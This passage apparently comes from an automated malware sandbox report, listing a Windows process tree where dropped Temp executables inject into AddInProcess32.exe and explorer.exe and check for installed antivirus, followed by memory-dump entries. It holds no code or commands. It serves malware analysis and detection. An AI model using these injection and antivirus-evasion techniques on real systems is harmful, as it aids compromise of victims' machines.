                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4000
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:2292
                                                                            • C:\Users\Admin\AppData\Local\Temp\59D9.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\59D9.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4868
                                                                            • C:\Users\Admin\AppData\Local\Temp\616B.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\616B.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:5612
                                                                            • C:\Users\Admin\AppData\Local\Temp\6AB3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\6AB3.exe
                                                                              1⤵
                                                                                PID:4772
                                                                              • C:\Users\Admin\AppData\Local\Temp\70DE.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\70DE.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4544
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  2⤵
                                                                                    PID:5432
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    2⤵
                                                                                      PID:4604
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:4376
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:5668
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:3252
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:4560
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:1676
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5556
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:4844
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:3920
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:6092
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:5620
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                  1⤵
                                                                                                  • Checks for any installed AV software in registry
                                                                                                  PID:4600
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:4140
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:4308
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:4652
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:1732

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • memory/352-193-0x000001E078E40000-0x000001E078EB0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/352-188-0x000001E078570000-0x000001E0785BB000-memory.dmp

                                                                                                      Filesize

                                                                                                      300KB

                                                                                                    • memory/832-118-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/928-232-0x0000020859E40000-0x0000020859EB0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1104-215-0x0000026B11320000-0x0000026B11390000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1228-239-0x0000015777240000-0x00000157772B0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1276-243-0x000001C197B60000-0x000001C197BD0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1352-234-0x000001A927A50000-0x000001A927AC0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1804-199-0x000001C8BD8C0000-0x000001C8BD930000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1852-236-0x000001AD22F50000-0x000001AD22FC0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2044-149-0x0000000002862000-0x0000000002864000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2044-152-0x0000000002865000-0x0000000002866000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2044-146-0x0000000002860000-0x0000000002862000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2272-136-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2456-201-0x00000122DE830000-0x00000122DE8A0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2472-209-0x000001B8EADD0000-0x000001B8EAE40000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2616-245-0x000001C469900000-0x000001C469970000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2644-247-0x000001BE65C40000-0x000001BE65CB0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2864-212-0x000001EB92840000-0x000001EB928B0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/3064-309-0x00000000025E0000-0x00000000025F7000-memory.dmp

                                                                                                      Filesize

                                                                                                      92KB

                                                                                                    • memory/3064-314-0x0000000002620000-0x0000000002635000-memory.dmp

                                                                                                      Filesize

                                                                                                      84KB

                                                                                                    • memory/3164-123-0x0000000002A60000-0x0000000002A62000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3564-126-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                      Filesize

                                                                                                      88KB

                                                                                                    • memory/3680-148-0x0000000002AB4000-0x0000000002AB5000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3680-137-0x0000000002AB0000-0x0000000002AB2000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3680-147-0x0000000002AB2000-0x0000000002AB4000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3680-150-0x0000000002AB5000-0x0000000002AB7000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3820-145-0x0000000002A60000-0x0000000002A62000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3848-190-0x0000000003720000-0x0000000003730000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/3848-174-0x0000000003580000-0x0000000003590000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/4036-114-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/4528-158-0x00000000005A0000-0x00000000005B2000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/4528-157-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5168-184-0x0000000000DA0000-0x0000000000DFC000-memory.dmp

                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/5168-182-0x0000000000AC4000-0x0000000000BC5000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/5248-306-0x0000000000400000-0x0000000002BA8000-memory.dmp

                                                                                                      Filesize

                                                                                                      39.7MB

                                                                                                    • memory/5248-304-0x0000000002BB0000-0x0000000002CFA000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.3MB

                                                                                                    • memory/5288-271-0x0000000004890000-0x0000000004921000-memory.dmp

                                                                                                      Filesize

                                                                                                      580KB

                                                                                                    • memory/5288-276-0x0000000000400000-0x0000000002BF4000-memory.dmp

                                                                                                      Filesize

                                                                                                      40.0MB

                                                                                                    • memory/5420-286-0x000001DF4F800000-0x000001DF4F8FF000-memory.dmp

                                                                                                      Filesize

                                                                                                      1020KB

                                                                                                    • memory/5420-214-0x000001DF4D200000-0x000001DF4D270000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/5524-263-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5524-264-0x0000000000490000-0x00000000004A2000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/5600-328-0x00000000067B2000-0x00000000067B3000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5600-327-0x00000000067B0000-0x00000000067B1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5600-337-0x00000000067B3000-0x00000000067B4000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-313-0x0000000000400000-0x0000000002FD0000-memory.dmp

                                                                                                      Filesize

                                                                                                      43.8MB

                                                                                                    • memory/5604-312-0x0000000005060000-0x000000000596B000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.0MB

                                                                                                    • memory/5648-299-0x0000000002C10000-0x0000000002C1C000-memory.dmp

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/5684-295-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/5972-303-0x0000000008370000-0x0000000008371000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-289-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-301-0x00000000079D0000-0x00000000079D1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-287-0x00000000052D0000-0x00000000052D1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-302-0x0000000008220000-0x0000000008221000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-294-0x00000000075B2000-0x00000000075B3000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-307-0x0000000008410000-0x0000000008411000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-322-0x00000000075B3000-0x00000000075B4000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-293-0x00000000075B0000-0x00000000075B1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5972-308-0x00000000082B0000-0x00000000082B1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB